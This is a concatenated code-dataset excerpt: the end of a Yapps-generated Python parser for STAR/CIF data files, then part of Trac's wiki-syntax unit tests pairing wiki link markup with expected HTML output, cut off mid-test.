top_loop = self.top_loop(_context)
makeloop(currentblock,top_loop)
else: # == 'data_name'
datakvpair = self.datakvpair(_context)
currentblock.AddItem(datakvpair[0],datakvpair[1],precheck=False)
def datakvpair(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'datakvpair', [])
data_name = self._scan('data_name')
data_value = self.data_value(_context)
return [data_name,data_value]
def data_value(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'data_value', [])
_token = self._peek('data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b')
if _token == 'data_value_1':
data_value_1 = self._scan('data_value_1')
thisval = data_value_1
elif _token not in ['start_sc_line', 'o_s_b', 'o_c_b']:
delimited_data_value = self.delimited_data_value(_context)
thisval = delimited_data_value
elif _token == 'start_sc_line':
sc_lines_of_text = self.sc_lines_of_text(_context)
thisval = stripextras(sc_lines_of_text)
else: # in ['o_s_b', 'o_c_b']
bracket_expression = self.bracket_expression(_context)
thisval = bracket_expression
return monitor('data_value',thisval)
def delimited_data_value(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'delimited_data_value', [])
_token = self._peek('triple_quote_data_value', 'single_quote_data_value')
if _token == 'triple_quote_data_value':
triple_quote_data_value = self._scan('triple_quote_data_value')
thisval = striptriple(triple_quote_data_value)
else: # == 'single_quote_data_value'
single_quote_data_value = self._scan('single_quote_data_value')
thisval = stripstring(single_quote_data_value)
return thisval
def sc_lines_of_text(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'sc_lines_of_text', [])
start_sc_line = self._scan('start_sc_line')
lines = StringIO();lines.write(start_sc_line)
while self._peek('end_sc_line', 'sc_line_of_text') == 'sc_line_of_text':
sc_line_of_text = self._scan('sc_line_of_text')
lines.write(sc_line_of_text)
if self._peek() not in ['end_sc_line', 'sc_line_of_text']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['sc_line_of_text', 'end_sc_line']))
end_sc_line = self._scan('end_sc_line')
lines.write(end_sc_line);return monitor('sc_line_of_text',lines.getvalue())
def bracket_expression(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'bracket_expression', [])
_token = self._peek('o_s_b', 'o_c_b')
if _token == 'o_s_b':
square_bracket_expr = self.square_bracket_expr(_context)
return square_bracket_expr
else: # == 'o_c_b'
curly_bracket_expr = self.curly_bracket_expr(_context)
return curly_bracket_expr
def top_loop(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'top_loop', [])
LBLOCK = self._scan('LBLOCK')
loopfield = self.loopfield(_context)
loopvalues = self.loopvalues(_context)
return loopfield,loopvalues
def loopfield(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'loopfield', [])
loop_seq=[]
while self._peek('data_name', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b') == 'data_name':
data_name = self._scan('data_name')
loop_seq.append(data_name)
if self._peek() not in ['data_name', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['data_name', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']))
return loop_seq
def loopvalues(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'loopvalues', [])
data_value = self.data_value(_context)
dataloop=[data_value]
while self._peek('data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b', 'LBLOCK', 'data_name', 'save_end', 'save_heading', 'END', 'data_heading') in ['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']:
data_value = self.data_value(_context)
dataloop.append(monitor('loopval',data_value))
if self._peek() not in ['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b', 'LBLOCK', 'data_name', 'save_end', 'save_heading', 'END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b', 'LBLOCK', 'data_name', 'save_end', 'save_heading', 'END', 'data_heading']))
return dataloop
def save_frame(self, prepared, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'save_frame', [prepared])
save_heading = self._scan('save_heading')
savehead = save_heading[5:];savebc = StarFile();newname = savebc.NewBlock(savehead,prepared.blocktype(overwrite=False));stored_block = savebc[newname]
while self._peek('save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading') in ['LBLOCK', 'data_name']:
dataseq = self.dataseq(savebc[savehead], _context)
if self._peek() not in ['save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading']))
save_end = self._scan('save_end')
return monitor('save_frame',savebc)
def square_bracket_expr(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'square_bracket_expr', [])
o_s_b = self._scan('o_s_b')
this_list = []
while self._peek('c_s_b', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b') != 'c_s_b':
data_value = self.data_value(_context)
this_list.append(data_value)
while self._peek('data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'c_s_b', 'o_s_b', 'o_c_b') != 'c_s_b':
data_value = self.data_value(_context)
this_list.append(data_value)
if self._peek() not in ['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'c_s_b', 'o_s_b', 'o_c_b']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b', 'c_s_b']))
if self._peek() not in ['c_s_b', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['data_value_1', 'c_s_b', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']))
c_s_b = self._scan('c_s_b')
return StarList(this_list)
def curly_bracket_expr(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'curly_bracket_expr', [])
o_c_b = self._scan('o_c_b')
table_as_list = []
while self._peek('c_c_b', 'triple_quote_data_value', 'single_quote_data_value') != 'c_c_b':
delimited_data_value = self.delimited_data_value(_context)
table_as_list = [delimited_data_value]
self._scan('":"')
data_value = self.data_value(_context)
table_as_list.append(data_value)
while self._peek('triple_quote_data_value', 'single_quote_data_value', 'c_c_b') != 'c_c_b':
delimited_data_value = self.delimited_data_value(_context)
table_as_list.append(delimited_data_value)
self._scan('":"')
data_value = self.data_value(_context)
table_as_list.append(data_value)
if self._peek() not in ['triple_quote_data_value', 'single_quote_data_value', 'c_c_b']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['triple_quote_data_value', 'single_quote_data_value', 'c_c_b']))
if self._peek() not in ['c_c_b', 'triple_quote_data_value', 'single_quote_data_value']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['triple_quote_data_value', 'single_quote_data_value', 'c_c_b']))
c_c_b = self._scan('c_c_b')
return StarDict(pairwise(table_as_list))
def parse(rule, text):
P = StarParser(StarParserScanner(text))
return yappsrt.wrap_error_reporter(P, rule)
# End -- grammar generated by Yapps
|
mit
| 7,016,748,564,123,988,000 | 57.227642 | 479 | 0.602066 | false |
dafrito/trac-mirror
|
trac/wiki/tests/wikisyntax.py
|
1
|
35299
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2013 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
from datetime import datetime
import unittest
from trac.util.datefmt import utc
from trac.wiki.model import WikiPage
from trac.wiki.tests import formatter
TEST_CASES = u"""
============================== wiki: link resolver
wiki:TestPage
wiki:TestPage/
wiki:/TestPage
[wiki:/TestPage]
[wiki:/TestPage ]
[wiki:/TestPage\u200B]
[wiki:/TestPage /TestPage]
wiki:"Space 1 23"
wiki:"C'est l'\xe9t\xe9"
wiki:MissingPage
wiki:12
wiki:abc
------------------------------
<p>
<a class="wiki" href="/wiki/TestPage">wiki:TestPage</a>
<a class="wiki" href="/wiki/TestPage">wiki:TestPage/</a>
<a class="wiki" href="/wiki/TestPage">wiki:/TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">/TestPage</a>
<a class="wiki" href="/wiki/Space%201%2023">wiki:"Space 1 23"</a>
<a class="wiki" href="/wiki/C'est%20l'%C3%A9t%C3%A9">wiki:"C'est l'\xe9t\xe9"</a>
<a class="missing wiki" href="/wiki/MissingPage" rel="nofollow">wiki:MissingPage?</a>
<a class="missing wiki" href="/wiki/12" rel="nofollow">wiki:12?</a>
<a class="missing wiki" href="/wiki/abc" rel="nofollow">wiki:abc?</a>
</p>
------------------------------
============================== wiki: link resolver + query and fragment
wiki:TestPage?format=txt
wiki:TestPage/?version=12
wiki:TestPage/?action=diff&version=12
wiki:"Space 1 23#heading"
------------------------------
<p>
<a class="wiki" href="/wiki/TestPage?format=txt">wiki:TestPage?format=txt</a>
<a class="wiki" href="/wiki/TestPage?version=12">wiki:TestPage/?version=12</a>
<a class="wiki" href="/wiki/TestPage?action=diff&version=12">wiki:TestPage/?action=diff&version=12</a>
<a class="wiki" href="/wiki/Space%201%2023#heading">wiki:"Space 1 23#heading"</a>
</p>
------------------------------
============================== WikiPageNames conformance
CamelCase AlabamA ABc AlaBamA FooBar
------------------------------
<p>
<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a> AlabamA ABc AlaBamA <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>
</p>
------------------------------
============================== WikiPageNames conformance (unicode)
SmÅogstore should produce a link
and so should wiki:ÜberflüssigkeitsTheorie
------------------------------
<p>
<a class="missing wiki" href="/wiki/Sm%C3%85ogstore" rel="nofollow">SmÅogstore?</a> should produce a link
and so should <a class="missing wiki" href="/wiki/%C3%9Cberfl%C3%BCssigkeitsTheorie" rel="nofollow">wiki:ÜberflüssigkeitsTheorie?</a>
</p>
------------------------------
============================== More WikiPageNames conformance
CamelCase,CamelCase.CamelCase: CamelCase
But not CamelCase2
nor CamelCase_
------------------------------
<p>
<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a>,<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a>.<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a>: <a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a>
But not CamelCase2
nor CamelCase_
</p>
------------------------------
============================== Escaping WikiPageNames
!CamelCase
------------------------------
<p>
CamelCase
</p>
------------------------------
============================== WikiPageNames endings
foo (FooBar )
foo FooBar: something
foo FooBar.
FooBar, foo
foo FooBar;
foo FooBar!
foo FooBar?
foo (FooBar)
foo {FooBar}
foo 'FooBar'
foo "FooBar"
foo [FooBar]
------------------------------
<p>
foo (<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a> )
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>: something
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>.
<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>, foo
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>;
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>!
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>?
foo (<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>)
foo {<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>}
foo '<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>'
foo "<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>"
foo [<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>]
</p>
------------------------------
============================== WikiPageNames counter examples
A0B1, ST62T53C6, IR32V1H000
------------------------------
<p>
A0B1, ST62T53C6, IR32V1H000
</p>
------------------------------
============================== WikiPageNames with fragment identifier
SandBox#heading-fixed-id
wiki:TracSubversion#TracandSubversion1.3.1. etc.
TracSubversion#TracandSubversion1.3.1. etc.
------------------------------
<p>
<a class="missing wiki" href="/wiki/SandBox#heading-fixed-id" rel="nofollow">SandBox#heading-fixed-id?</a>
</p>
<p>
<a class="missing wiki" href="/wiki/TracSubversion#TracandSubversion1.3.1" rel="nofollow">wiki:TracSubversion#TracandSubversion1.3.1?</a>. etc.
<a class="missing wiki" href="/wiki/TracSubversion#TracandSubversion1.3.1" rel="nofollow">TracSubversion#TracandSubversion1.3.1?</a>. etc.
</p>
------------------------------
============================== WikiPageNames with fragment id (performance test)
BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil)
[BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil)]
[BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil) speed]
------------------------------
<p>
<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml?</a>(fpxml=nil)
</p>
<p>
[<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml?</a>(fpxml=nil)]
</p>
<p>
[<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml?</a>(fpxml=nil) speed]
</p>
------------------------------
============================== WikiPageNames counter examples (paths)
/absolute/path/is/NotWiki and relative/path/is/NotWiki and ../higher/is/NotWiki
but ThisIs/SubWiki and now This/Also
and ../Relative/Camel or /Absolute/Camel as well
------------------------------
<p>
/absolute/path/is/NotWiki and relative/path/is/NotWiki and ../higher/is/NotWiki
but <a class="missing wiki" href="/wiki/ThisIs/SubWiki" rel="nofollow">ThisIs/SubWiki?</a> and now <a class="missing wiki" href="/wiki/This/Also" rel="nofollow">This/Also?</a>
and <a class="missing wiki" href="/wiki/Relative/Camel" rel="nofollow">../Relative/Camel?</a> or <a class="missing wiki" href="/wiki/Absolute/Camel" rel="nofollow">/Absolute/Camel?</a> as well
</p>
------------------------------
============================== WikiPageNames counter examples (numbers)
8FjBpOmy
anotherWikiPageName
------------------------------
<p>
8FjBpOmy
anotherWikiPageName
</p>
------------------------------
8FjBpOmy
anotherWikiPageName
============================== WikiPageNames counter examples (unicode)
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
------------------------------
<p>
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
</p>
------------------------------
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
============================== not a WikiPageNames at all (#9025 regression)
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
------------------------------
<p>
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
</p>
------------------------------
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
============================== MoinMoin style forced links
This is a ["Wiki"] page link.
This is a ["Wiki" wiki page] link with label.
This is a ["Wiki?param=1#fragment"] page link with query and fragment.
------------------------------
<p>
This is a <a class="missing wiki" href="/wiki/Wiki" rel="nofollow">Wiki?</a> page link.
This is a <a class="missing wiki" href="/wiki/Wiki" rel="nofollow">wiki page?</a> link with label.
This is a <a class="missing wiki" href="/wiki/Wiki?param=1#fragment" rel="nofollow">Wiki?</a> page link with query and fragment.
</p>
------------------------------
============================== Wiki links with @version
wiki:page@12
WikiStart@12
WikiStart@12#heading
[WikiStart@12]
[WikiStart@12#heading]
This is a ["Wiki@12"] page link.
[wiki:WikiStart@12?format=txt v12 as text]
------------------------------
<p>
<a class="missing wiki" href="/wiki/page?version=12" rel="nofollow">wiki:page@12?</a>
<a class="wiki" href="/wiki/WikiStart?version=12">WikiStart@12</a>
<a class="wiki" href="/wiki/WikiStart?version=12#heading">WikiStart@12#heading</a>
[<a class="wiki" href="/wiki/WikiStart?version=12">WikiStart@12</a>]
[<a class="wiki" href="/wiki/WikiStart?version=12#heading">WikiStart@12#heading</a>]
This is a <a class="missing wiki" href="/wiki/Wiki?version=12" rel="nofollow">Wiki@12?</a> page link.
<a class="wiki" href="/wiki/WikiStart?version=12&format=txt">v12 as text</a>
</p>
------------------------------
============================== WikiPageName with label
See details of the [WikiPageNames wiki page name] syntax.
Here's a [BadExample\fbad] example with special whitespace.
We can also [WikiLabels '"use [quotes]"']
or [WikiLabels "'use [quotes]'"]
------------------------------
<p>
See details of the <a class="missing wiki" href="/wiki/WikiPageNames" rel="nofollow">wiki page name?</a> syntax.
Here's a <a class="missing wiki" href="/wiki/BadExample" rel="nofollow">bad?</a> example with special whitespace.
We can also <a class="missing wiki" href="/wiki/WikiLabels" rel="nofollow">"use [quotes]"?</a>
or <a class="missing wiki" href="/wiki/WikiLabels" rel="nofollow">'use [quotes]'?</a>
</p>
------------------------------
============================== WikiPageName with label should be strict...
new_channel_name [, '''integer''' handle [, '''boolean''' test]]
------------------------------
<p>
new_channel_name [, <strong>integer</strong> handle [, <strong>boolean</strong> test]]
</p>
------------------------------
============================== InterTrac for wiki
t:wiki:InterTrac
trac:wiki:InterTrac
[t:wiki:InterTrac intertrac]
[trac:wiki:InterTrac intertrac]
[trac:wiki:JonasBorgström jonas]
------------------------------
<p>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in Trac's Trac"><span class="icon"></span>t:wiki:InterTrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in Trac's Trac"><span class="icon"></span>trac:wiki:InterTrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in Trac's Trac"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in Trac's Trac"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AJonasBorgstr%C3%B6m" title="wiki:JonasBorgström in Trac's Trac"><span class="icon"></span>jonas</a>
</p>
------------------------------
============================== Wiki InterTrac shorthands
t:InterTrac
trac:InterTrac
[t:InterTrac intertrac]
[trac:InterTrac intertrac]
[trac:JonasBorgström jonas]
------------------------------
<p>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in Trac's Trac"><span class="icon"></span>t:InterTrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in Trac's Trac"><span class="icon"></span>trac:InterTrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in Trac's Trac"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in Trac's Trac"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/JonasBorgstr%C3%B6m" title="JonasBorgström in Trac's Trac"><span class="icon"></span>jonas</a>
</p>
------------------------------
============================== InterWiki links
This is the original MeatBall:InterMapTxt wiki page.
Checkout the [tsvn:http://svn.edgewall.com/repos/trac Trac Repository].
complex link complex:a:test with positional arguments
complex link complex:a (not enough arguments)
complex link complex:a:test:more (too many arguments)
in trac.ini inter:b:resource
in trac.ini over:c:something overrides wiki
NoLink:ignored
NoLink:
NoLink: ...
------------------------------
<p>
This is the original <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt</a> wiki page.
Checkout the <a class="ext-link" href="tsvn:http://svn.edgewall.com/repos/trac" title="http://svn.edgewall.com/repos/trac in tsvn"><span class="icon"></span>Trac Repository</a>.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt" title="resource test in a"><span class="icon"></span>complex:a:test</a> with positional arguments
complex link <a class="ext-link" href="http://server/a/page/?format=txt" title="resource in a"><span class="icon"></span>complex:a</a> (not enough arguments)
complex link <a class="ext-link" href="http://server/a/page/test:more?format=txt" title="resource test:more in a"><span class="icon"></span>complex:a:test:more</a> (too many arguments)
</p>
<p>
in trac.ini <a class="ext-link" href="http://inter/b/page/resource" title="Resource resource in b"><span class="icon"></span>inter:b:resource</a>
in trac.ini <a class="ext-link" href="http://over/c/page/something" title="c:something in over"><span class="icon"></span>over:c:something</a> overrides wiki
</p>
<p>
NoLink:ignored
<a class="missing wiki" href="/wiki/NoLink" rel="nofollow">NoLink?</a>:
<a class="missing wiki" href="/wiki/NoLink" rel="nofollow">NoLink?</a>: ...
</p>
------------------------------
============================== InterWiki links with parameters and fragment
See also MeatBall:InterMapTxt#there wiki page
and MeatBall:InterMapTxt?format=txt#there wiki page.
complex link complex:a:test?go#there with positional arguments
------------------------------
<p>
See also <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt#there" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt#there</a> wiki page
and <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt&format=txt#there" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt?format=txt#there</a> wiki page.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt&go#there" title="resource test in a"><span class="icon"></span>complex:a:test?go#there</a> with positional arguments
</p>
------------------------------
============================== Regression for #9712
This is not a link: x,://localhost
------------------------------
<p>
This is not a link: x,:<em>localhost
</em></p>
------------------------------
============================== Wiki links with @version using unicode digits
WikiStart@₄₂
WikiStart@₄₂#heading
[WikiStart@₄₂]
[WikiStart@₄₂#heading]
------------------------------
<p>
<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂
<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂#heading
[<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂]
[<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂#heading]
</p>
------------------------------
""" #" Emacs likes it that way better
RELATIVE_LINKS_TESTS = u"""
============================== Relative to the project url
[//docs Documentation]
[//docs?param=1#fragment Documentation]
[//docs]
[//docs //docs]
[//docs?param=1#fragment]
[// Home]
[//]
[//?param=1#fragment]
------------------------------
<p>
<a href="/docs">Documentation</a>
<a href="/docs?param=1#fragment">Documentation</a>
<a href="/docs">docs</a>
<a href="/docs">//docs</a>
<a href="/docs?param=1#fragment">docs</a>
<a href="/">Home</a>
<a href="/">//</a>
<a href="/?param=1#fragment">//</a>
</p>
------------------------------
============================== Relative to the base url
[/newticket?priority=high#fragment bug]
[/newticket?priority=high#fragment]
[/newticket]
[/newticket /newticket]
[/ Project]
[/]
[/?param=1#fragment]
------------------------------
<p>
<a href="/newticket?priority=high#fragment">bug</a>
<a href="/newticket?priority=high#fragment">newticket</a>
<a href="/newticket">newticket</a>
<a href="/newticket">/newticket</a>
<a href="/">Project</a>
<a href="/">/</a>
<a href="/?param=1#fragment">/</a>
</p>
------------------------------
============================== Relative to the current page
[.]
[./]
[..]
[../]
[./../.]
[. this page]
[./Detail see detail]
[./Detail]
[./Detail ./Detail]
[.. see parent]
[../Other see other]
[../Other]
[../Other ../Other]
[.././../Other]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub">.</a>
<a class="wiki" href="/wiki/Main/Sub">./</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">..?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">../?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">./../.?</a>
<a class="wiki" href="/wiki/Main/Sub">this page</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">see detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">./Detail?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">Other?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">../Other?</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other?</a>
</p>
------------------------------
============================== Relative to the current page, in wiki realm
[wiki:. this page]
[wiki:./Detail]
[wiki:"./Detail"]
[wiki:./Detail ./Detail]
[wiki:./Detail see detail]
[wiki:.. see parent]
[wiki:../Other see other]
[wiki:.././../Other]
["."]
[".?param=1#fragment"]
["./Detail"]
["./Detail?param=1#fragment"]
[".."]
["..?param=1#fragment"]
["../Other"]
["../Other?param=1#fragment"]
[".././../Other"]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub">this page</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">./Detail?</a>
